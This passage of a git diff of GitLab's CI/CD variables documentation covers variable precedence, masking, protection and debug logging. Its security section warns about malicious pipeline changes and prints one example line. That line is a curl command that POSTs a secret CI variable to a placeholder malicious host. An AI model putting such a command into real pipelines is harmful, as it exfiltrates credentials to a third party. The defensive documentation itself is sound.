CI_RUNNER_TAGS="docker, linux" -export CI_SERVER="yes" -export CI_SERVER_URL="https://example.com" -export CI_SERVER_HOST="example.com" -export CI_SERVER_PORT="443" -export CI_SERVER_PROTOCOL="https" -export CI_SERVER_NAME="GitLab" -export CI_SERVER_REVISION="70606bf" -export CI_SERVER_VERSION="8.9.0" -export CI_SERVER_VERSION_MAJOR="8" -export CI_SERVER_VERSION_MINOR="9" -export CI_SERVER_VERSION_PATCH="0" -export GITLAB_USER_EMAIL="user@example.com" -export GITLAB_USER_ID="42" -... -``` - -## Pass an environment variable to another job - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1. - -You can pass environment variables from one job to another job in a later stage. -These variables cannot be used as CI/CD variables to configure a pipeline, but -they can be used in job scripts. - -1. In the job script, save the variable as a `.env` file. -1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/README.md#artifactsreportsdotenv) -artifact. -1. Set a job in a later stage to receive the artifact by using the [`dependencies`](../yaml/README.md#dependencies) - or the [`needs`](../yaml/README.md#artifact-downloads-with-needs) keywords. -1. The later job can then [use the variable in scripts](#use-cicd-variables-in-job-scripts). - -For example, with the [`dependencies`](../yaml/README.md#dependencies) keyword: - -```yaml -build: - stage: build - script: - - echo "BUILD_VERSION=hello" >> build.env - artifacts: - reports: - dotenv: build.env - -deploy: - stage: deploy - script: - - echo "$BUILD_VERSION" # Output is: 'hello' - dependencies: - - build -``` - -For example, with the [`needs`](../yaml/README.md#artifact-downloads-with-needs) keyword: - -```yaml -build: - stage: build - script: - - echo "BUILD_VERSION=hello" >> build.env - artifacts: - reports: - dotenv: build.env - -deploy: - stage: deploy - script: - - echo "$BUILD_VERSION" # Output is: 'hello' - needs: - - job: build - artifacts: true -``` - -## CI/CD variable precedence - -You can use CI/CD variables with the same name in different places, but the values -can overwrite each other. The type of variable and where they are defined determines -which variables take precedence. - -The order of precedence for variables is (from highest to lowest): - -1. [Trigger variables](../triggers/README.md#making-use-of-trigger-variables), - [scheduled pipeline variables](../pipelines/schedules.md#using-variables), - and [manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually). -1. Project [variables](#custom-cicd-variables). -1. Group [variables](#add-a-cicd-variable-to-a-group). -1. Instance [variables](#add-a-cicd-variable-to-an-instance). -1. [Inherited variables](#pass-an-environment-variable-to-another-job). -1. Variables defined in jobs in the `.gitlab-ci.yml` file. -1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file. -1. [Deployment variables](#deployment-variables). -1. [Predefined variables](predefined_variables.md). - -In the following example, when the script in `job1` executes, the value of `API_TOKEN` is `secure`. -Variables defined in jobs have a higher precedence than variables defined globally. - -```yaml -variables: - API_TOKEN: "default" - -job1: - variables: - API_TOKEN: "secure" - script: - - echo "The variable value is $API_TOKEN" -``` - -## Override a defined CI/CD variable - -You can override the value of a variable when you: - -1. [Run a pipeline manually](#override-a-variable-when-running-a-pipeline-manually) in the UI. -1. Create a pipeline by using [the API](../../api/pipelines.md#create-a-new-pipeline). -1. Run a job manually in the UI. -1. Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd). -1. Trigger a pipeline by using [the API](../triggers/README.md#making-use-of-trigger-variables). -1. Pass variables to a [downstream pipeline](../multi_project_pipelines.md#passing-cicd-variables-to-a-downstream-pipeline). - -The pipeline variables declared in these events take [priority over other variables](#cicd-variable-precedence). - -### Override a variable when running a pipeline manually - -You can override the value of a CI/CD variable when you -[run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually). - -1. Go to your project's **CI/CD > Pipelines** and select **Run pipeline**. -1. Choose the branch you want to run the pipeline for. -1. Input the variable and its value in the UI. - -### Restrict who can override variables - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8. - -You can grant permission to override variables to [maintainers](../../user/permissions.md#project-features) only. When other users try to run a pipeline -with overridden variables, they receive the `Insufficient permissions to set pipeline variables` -error message. - -If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#custom-cicd-configuration-file), -use this setting for control over the environment the pipeline runs in. - -You can enable this feature by using [the projects API](../../api/projects.md#edit-project) -to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default. - -## Limit the environment scope of a CI/CD variable - -By default, all CI/CD variables are available to any job in a pipeline. Therefore, if a project uses a -compromised tool in a test job, it could expose all CI/CD variables that a deployment job used. This is -a common scenario in supply chain attacks. GitLab helps mitigate supply chain attacks by limiting -the environment scope of a variable. GitLab does this by -[defining which environments and corresponding jobs](../environments/index.md) -the variable can be available for. - -To learn more about scoping environments, see [Scoping environments with specs](../environments/index.md#scoping-environments-with-specs). - -To learn more about ensuring CI/CD variables are only exposed in pipelines running from protected -branches or tags, see [Protect a CI/CD Variable](#protect-a-cicd-variable). - -## Deployment variables - -Integrations that are responsible for deployment configuration can define their own -variables that are set in the build environment. These variables are only defined -for [deployment jobs](../environments/index.md). - -For example, the [Kubernetes integration](../../user/project/clusters/index.md#deployment-variables) -defines deployment variables that you can use with the integration. - -The [documentation for each integration](../../user/project/integrations/overview.md) -explains if the integration has any deployment variables available. - -## Auto DevOps environment variables - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/49056) in GitLab 11.7. - -You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables -to a running application. - -To make a CI/CD variable available as an environment variable in the running application's container, -[prefix the variable key](../../topics/autodevops/customize.md#application-secret-variables) -with `K8S_SECRET_`. - -CI/CD variables with multi-line values are not supported. - -## Debug logging - -> Introduced in GitLab Runner 1.7. - -WARNING: -Debug logging can be a serious security risk. The output contains the content of -all variables and other secrets available to the job. The output is uploaded to the -GitLab server and visible in job logs. - -You can use debug logging to help troubleshoot problems with pipeline configuration -or job scripts. Debug logging exposes job execution details that are usually hidden -by the runner and makes job logs more verbose. It also exposes all variables and secrets -available to the job. - -Before you enable debug logging, make sure only [team members](../../user/permissions.md#project-features) -can view job logs. You should also [delete job logs](../jobs/index.md#view-jobs-in-a-pipeline) -with debug output before you make logs public again. - -### Enable Debug logging - -To enable debug logging (tracing), set the `CI_DEBUG_TRACE` variable to `true`: - -```yaml -job_name: - variables: - CI_DEBUG_TRACE: "true" -``` - -Example output (truncated): - -```shell -... -export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE" -if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then - echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\'' - $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace" - $'\''git'\'' "config" "fetch.recurseSubmodules" "false" - $'\''rm'\'' "-f" ".git/index.lock" - $'\''git'\'' "clean" "-ffdx" - $'\''git'\'' "reset" "--hard" - $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git" - $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds" -++ CI_BUILDS_DIR=/builds -++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace -++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace -++ export CI_CONCURRENT_ID=87 -++ CI_CONCURRENT_ID=87 -++ export CI_CONCURRENT_PROJECT_ID=0 -++ CI_CONCURRENT_PROJECT_ID=0 -++ export CI_SERVER=yes -++ CI_SERVER=yes -++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp -++ echo -n '-----BEGIN CERTIFICATE----- ------END CERTIFICATE-----' -++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE -++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE -++ export CI_PIPELINE_ID=52666 -++ CI_PIPELINE_ID=52666 -++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 -++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 -++ export CI_JOB_ID=7046507 -++ CI_JOB_ID=7046507 -++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 -++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 -++ export CI_JOB_TOKEN=[MASKED] -++ CI_JOB_TOKEN=[MASKED] -++ export CI_REGISTRY_USER=gitlab-ci-token -++ CI_REGISTRY_USER=gitlab-ci-token -++ export CI_REGISTRY_PASSWORD=[MASKED] -++ CI_REGISTRY_PASSWORD=[MASKED] -++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git -++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git -++ export CI_JOB_NAME=debug_trace -++ CI_JOB_NAME=debug_trace -++ export CI_JOB_STAGE=test -++ CI_JOB_STAGE=test -++ export CI_NODE_TOTAL=1 -++ CI_NODE_TOTAL=1 -++ export CI=true -++ CI=true -++ export GITLAB_CI=true -++ GITLAB_CI=true -++ export CI_SERVER_URL=https://gitlab.com:3000 -++ CI_SERVER_URL=https://gitlab.com:3000 -++ export CI_SERVER_HOST=gitlab.com -++ CI_SERVER_HOST=gitlab.com -++ export CI_SERVER_PORT=3000 -++ CI_SERVER_PORT=3000 -++ export CI_SERVER_PROTOCOL=https -++ CI_SERVER_PROTOCOL=https -++ export CI_SERVER_NAME=GitLab -++ CI_SERVER_NAME=GitLab -++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal -++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal -++ export CI_PROJECT_ID=17893 -++ CI_PROJECT_ID=17893 -++ export CI_PROJECT_NAME=ci-debug-trace -++ CI_PROJECT_NAME=ci-debug-trace -++ export CI_PROJECT_TITLE='GitLab FOSS' -++ CI_PROJECT_TITLE='GitLab FOSS' -++ export CI_PROJECT_PATH=gitlab-examples/ci-debug-trace -++ CI_PROJECT_PATH=gitlab-examples/ci-debug-trace -++ export CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace -++ CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace -++ export CI_PROJECT_NAMESPACE=gitlab-examples -++ CI_PROJECT_NAMESPACE=gitlab-examples -++ export CI_PROJECT_ROOT_NAMESPACE=gitlab-examples -++ CI_PROJECT_ROOT_NAMESPACE=gitlab-examples -++ export CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace -++ CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace -++ export CI_PROJECT_VISIBILITY=public -++ CI_PROJECT_VISIBILITY=public -++ export CI_PROJECT_REPOSITORY_LANGUAGES= -++ CI_PROJECT_REPOSITORY_LANGUAGES= -++ export CI_DEFAULT_BRANCH=main -++ CI_DEFAULT_BRANCH=main -++ export CI_REGISTRY=registry.gitlab.com -++ CI_REGISTRY=registry.gitlab.com -++ export CI_API_V4_URL=https://gitlab.com/api/v4 -++ CI_API_V4_URL=https://gitlab.com/api/v4 -++ export CI_PIPELINE_IID=123 -++ CI_PIPELINE_IID=123 -++ export CI_PIPELINE_SOURCE=web -++ CI_PIPELINE_SOURCE=web -++ export CI_CONFIG_PATH=.gitlab-ci.yml -++ CI_CONFIG_PATH=.gitlab-ci.yml -++ export CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045 -++ CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045 -++ export CI_COMMIT_SHORT_SHA=dd648b2e -++ CI_COMMIT_SHORT_SHA=dd648b2e -++ export CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000 -++ CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000 -++ export CI_COMMIT_REF_NAME=main -++ CI_COMMIT_REF_NAME=main -++ export CI_COMMIT_REF_SLUG=main -++ CI_COMMIT_REF_SLUG=main -... -``` - -### Restrict access to debug logging - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/213159) in GitLab 13.7. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292661) in GitLab 13.8. - -You can restrict access to debug logging. When restricted, only users with -[developer or higher permissions](../../user/permissions.md#project-members-permissions) -can view job logs when debug logging is enabled with a variable in: - -- The [`.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). -- The CI/CD variables set in the GitLab UI. - -WARNING: -If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible -to all users with access to job logs. The permission levels are not checked by the runner, -so you should only use the variable in GitLab itself. - -## Video walkthrough of a working example - -The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) -video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) -working example project. It explains how multiple levels of group CI/CD variables -can be combined with environment-scoped project variables for complex configuration -of application builds or deployments. - -The example can be copied to your own group or instance for testing. More details -on what other GitLab CI patterns are demonstrated are available at the project page. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/variables/index.md b/doc/ci/variables/index.md new file mode 100644 index 00000000000..e6768968d83 --- /dev/null +++ b/doc/ci/variables/index.md @@ -0,0 +1,824 @@ +--- +stage: Verify +group: Pipeline Authoring +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# GitLab CI/CD variables **(FREE)** + +CI/CD variables are a type of environment variable. You can use them to: + +- Control the behavior of jobs and [pipelines](../pipelines/index.md). +- Store values you want to re-use. +- Avoid hard-coding values in your `.gitlab-ci.yml` file. + +You can use [predefined CI/CD variables](#predefined-cicd-variables) or define custom: + +- [Variables in the `.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). +- [Project CI/CD variables](#add-a-cicd-variable-to-a-project). +- [Group CI/CD variables](#add-a-cicd-variable-to-a-group). +- [Instance CI/CD variables](#add-a-cicd-variable-to-an-instance). + +> For more information about advanced use of GitLab CI/CD: +> +> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Get to productivity faster with these [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/) +> shared by GitLab engineers. +> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Learn how the Cloud Native Computing Foundation (CNCF) [eliminates the complexity](https://about.gitlab.com/customers/cncf/) +> of managing projects across many cloud providers with GitLab CI/CD. + +## Predefined CI/CD variables + +GitLab CI/CD has a [default set of predefined CI/CD variables](predefined_variables.md) +you can use in pipelines configuration and job scripts. + +### Use predefined CI/CD variables + +You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. + +This example shows how to output a job's stage by using the `CI_JOB_STAGE` +predefined variable: + +```yaml +test_variable: + stage: test + script: + - echo "$CI_JOB_STAGE" +``` + +The script outputs the `stage` for the `test_variable`, which is `test`: + + + +## Custom CI/CD variables + +You can create custom CI/CD variables: + +- For a project: + - [In the project's `.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). + - [In the project's settings](#add-a-cicd-variable-to-a-project). + - [With the API](../../api/project_level_variables.md). +- For all projects in a group [in the group's setting](#add-a-cicd-variable-to-a-group). +- For all projects in a GitLab instance [in the instance's settings](#add-a-cicd-variable-to-an-instance). + +You can [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs), +or have them [prefilled in manual pipelines](../pipelines/index.md#prefill-variables-in-manual-pipelines). + +There are two types of variables: [`File` or `Variable`](#cicd-variable-types). + +Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/index.html) +to execute scripts. Each shell has its own set of reserved variable names. + +Make sure each variable is defined for the [scope you want to use it in](where_variables_can_be_used.md). + +By default, pipelines from forked projects can't access CI/CD variables in the parent project. +If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project), +all variables become available to the pipeline. + +### Create a custom CI/CD variable in the `.gitlab-ci.yml` file + +To create a custom variable in the [`.gitlab-ci.yml`](../yaml/index.md#variables) file, +define the variable and value with `variables` keyword. + +You can use the `variables` keyword in a job or at the top level of the `.gitlab-ci.yml` file. +If the variable is at the top level, it's globally available and all jobs can use it. +If it's defined in a job, only that job can use it. + +```yaml +variables: + TEST_VAR: "All jobs can use this variable's value" + +job1: + variables: + TEST_VAR_JOB: "Only job1 can use this variable's value" + script: + - echo "$TEST_VAR" and "$TEST_VAR_JOB" +``` + +Variables saved in the `.gitlab-ci.yml` file should store only non-sensitive project +configuration, like a `RAILS_ENV` or `DATABASE_URL` variable. These variables are +visible in the repository. Store sensitive variables containing secrets, keys, and so on +in project settings. + +Variables saved in the `.gitlab-ci.yml` file are also available in [service containers](../docker/using_docker_images.md). + +If you don't want globally defined variables to be available in a job, set `variables` +to `{}`: + +```yaml +job1: + variables: {} + script: + - echo This job does not need any variables +``` + +You can use variables to help define other variables. Use `$$` to ignore a variable +name inside another variable: + +```yaml +variables: + FLAGS: '-al' + LS_CMD: 'ls "$FLAGS" $$TMP_DIR' +script: + - 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR' +``` + +Use the [`value` and `description`](../yaml/index.md#prefill-variables-in-manual-pipelines) +keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines) +for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually). + +### Add a CI/CD variable to a project + +You can add CI/CD variables to a project's settings. Only project members with the +[Maintainer role](../../user/permissions.md#project-members-permissions) +can add or update project CI/CD variables. To keep a CI/CD variable secret, put it +in the project settings, not in the `.gitlab-ci.yml` file. + +To add or update variables in the project settings: + +1. Go to your project's **Settings > CI/CD** and expand the **Variables** section. +1. Select the **Add Variable** button and fill in the details: + + - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. + - **Value**: No limitations. + - **Type**: [`File` or `Variable`](#cicd-variable-types). + - **Environment scope**: (Optional) `All`, or specific [environments](../environments/index.md). + - **Protect variable** (Optional): If selected, the variable is only available + in pipelines that run on protected branches or tags. + - **Mask variable** (Optional): If selected, the variable's **Value** is masked + in job logs. The variable fails to save if the value does not meet the + [masking requirements](#mask-a-cicd-variable). + +After you create a variable, you can use it in the `.gitlab-ci.yml` file: + +```yaml +test_variable: + stage: test + script: + - echo "$CI_JOB_STAGE" # calls a predefined variable + - echo "$TEST" # calls a custom variable of type `env_var` + - echo "$GREETING" # calls a custom variable of type `file` that contains the path to the temp file + - cat "$GREETING" # the temp file itself contains the variable value +``` + +The output is: + + + +### Add a CI/CD variable to a group + +> Support for [environment scopes](https://gitlab.com/gitlab-org/gitlab/-/issues/2874) added to GitLab Premium in 13.11 + +To make a CI/CD variable available to all projects in a group, define a group CI/CD variable. + +Use group variables to store secrets like passwords, SSH keys, and credentials, if you: + +- Do **not** use an external key store. +- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md). + +To add a group variable: + +1. In the group, go to **Settings > CI/CD**. +1. Select the **Add Variable** button and fill in the details: + + - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. + - **Value**: No limitations. + - **Type**: [`File` or `Variable`](#cicd-variable-types). + - **Environment scope** (Optional): `All`, or specific [environments](#limit-the-environment-scope-of-a-cicd-variable). **(PREMIUM)** + - **Protect variable** (Optional): If selected, the variable is only available + in pipelines that run on protected branches or tags. + - **Mask variable** (Optional): If selected, the variable's **Value** is masked + in job logs. The variable fails to save if the value does not meet the + [masking requirements](#mask-a-cicd-variable). + +#### View all group-level variables available in a project + +To view all the group-level variables available in a project: + +1. In the project, go to **Settings > CI/CD**. +1. Expand the **Variables** section. + +Variables from [subgroups](../../user/group/subgroups/index.md) are recursively +inherited. + + + +### Add a CI/CD variable to an instance **(FREE SELF)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/299879) in GitLab 13.11. + +To make a CI/CD variable available to all projects and groups in a GitLab instance, +add an instance CI/CD variable. You must have the [Administrator role](../../user/permissions.md). + +You can define instance variables via the UI or [API](../../api/instance_level_ci_variables.md). + +To add an instance variable: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > CI/CD** and expand the **Variables** section. +1. Select the **Add variable** button, and fill in the details: + + - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. + - **Value**: [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028), + 10,000 characters is allowed. This is also bounded by the limits of the selected + runner operating system. In GitLab 13.0 to 13.2, 700 characters is allowed. + - **Type**: [`File` or `Variable`](#cicd-variable-types). + - **Protect variable** (Optional): If selected, the variable is only available + in pipelines that run on protected branches or tags. + - **Mask variable** (Optional): If selected, the variable's **Value** is not shown + in job logs. The variable is not saved if the value does not meet the [masking requirements](#mask-a-cicd-variable). + +### CI/CD variable types + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/46806) in GitLab 11.11. + +All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file +are `Variable` type. Project, group and instance CI/CD variables can be `Variable` +or `File` type. + +`Variable` type variables: + +- Consist of a key and value pair. +- Are made available in jobs as environment variables, with: + - The CI/CD variable key as the environment variable name. + - The CI/CD variable value as the environment variable value. + +Use `File` type CI/CD variables for tools that need a file as input. + +`File` type variables: + +- Consist of a key, value and file. +- Are made available in jobs as environment variables, with + - The CI/CD variable key as the environment variable name. + - The CI/CD variable value saved to a temporary file. + - The path to the temporary file as the environment variable value. + +Some tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) +and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) +use `File` type variables for configuration. + +For example, if you have the following variables: + +- A variable of type `Variable`: `KUBE_URL` with the value `https://example.com`. +- A variable of type `File`: `KUBE_CA_PEM` with a certificate as the value. + +Use the variables in a job script like this: + +```shell +kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" +``` + +An alternative to `File` type variables is to: + +- Read the value of a CI/CD variable (`variable` type). +- Save the value in a file. +- Use that file in your script. + +```shell +# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file +echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem" +# Pass the newly created file to kubectl +kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem" +``` + +### Mask a CI/CD variable + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784) in GitLab 11.10 + +You can mask a project, group, or instance CI/CD variable so the value of the variable +does not display in job logs. + +To mask a variable: + +1. In the project, group, or Admin Area, go to **Settings > CI/CD**. +1. Expand the **Variables** section. +1. Next to the variable you want to protect, select **Edit**. +1. Select the **Mask variable** check box. +1. Select **Update variable**. + +The value of the variable must: + +- Be a single line. +- Be 8 characters or longer, consisting only of: + - Characters from the Base64 alphabet (RFC4648). + - The `@` and `:` characters ([In GitLab 12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/63043) and later). + - The `.` character ([In GitLab 12.10](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/29022) and later). + - The `~` character ([In GitLab 13.12](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61517) and later). +- Not match the name of an existing predefined or custom CI/CD variable. + +NOTE: +Masking a CI/CD variable is not a guaranteed way to prevent malicious users from accessing +variable values. To make variables more secure, you can [use external secrets](../secrets/index.md). + +### Protect a CI/CD variable + +You can protect a project, group or instance CI/CD variable so it is only passed +to pipelines running on [protected branches](../../user/project/protected_branches.md) +or [protected tags](../../user/project/protected_tags.md). + +To protect a variable: + +1. Go to **Settings > CI/CD** in the project, group or instance admin area. +1. Expand the **Variables** section. +1. Next to the variable you want to protect, select **Edit**. +1. Select the **Protect variable** check box. +1. Select **Update variable**. + +The variable is available for all subsequent pipelines. + +### CI/CD variable security + +Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables +and send them to a third party server regardless of the masked setting. If the pipeline +runs on a [protected branch](../../user/project/protected_branches.md) or +[protected tag](../../user/project/protected_tags.md), malicious code can compromise protected variables. + +Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you: + +- [Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project). +- Merge the changes. + +The following example shows malicious code in a `.gitlab-ci.yml` file: + +```yaml +build: + script: + - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" +``` + +Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) +and stored in the database. This data can only be read and decrypted with a +valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-lost). + +### Custom variables validated by GitLab + +Some variables are listed in the UI so you can choose them more quickly. + +| Variable | Allowed Values | Introduced in | +|-------------------------|----------------------------------------------------|---------------| +| `AWS_ACCESS_KEY_ID` | Any | 12.10 | +| `AWS_DEFAULT_REGION` | Any | 12.10 | +| `AWS_SECRET_ACCESS_KEY` | Any | 12.10 | + +WARNING: +When you store credentials, there are [security implications](#cicd-variable-security). +If you use AWS keys for example, follow the [Best practices for managing AWS access keys](https://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html). + +## Use CI/CD variables in job scripts + +All CI/CD variables are set as environment variables in the job's environment. +You can use variables in job scripts with the standard formatting for each environment's +shell. + +To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/). + +### Use variables with Bash, `sh` and similar + +To access environment variables in Bash, `sh`, and similar shells, prefix the +CI/CD variable with (`$`): + +```yaml +job_name: + script: + - echo "$CI_JOB_ID" +``` + +### Use variables with PowerShell + +To access variables in a Windows PowerShell environment, including environment +variables set by the system, prefix the variable name with (`$env:`) or (`$`): + +```yaml +job_name: + script: + - echo $env:CI_JOB_ID + - echo $CI_JOB_ID + - echo $env:PATH +``` + +In [some 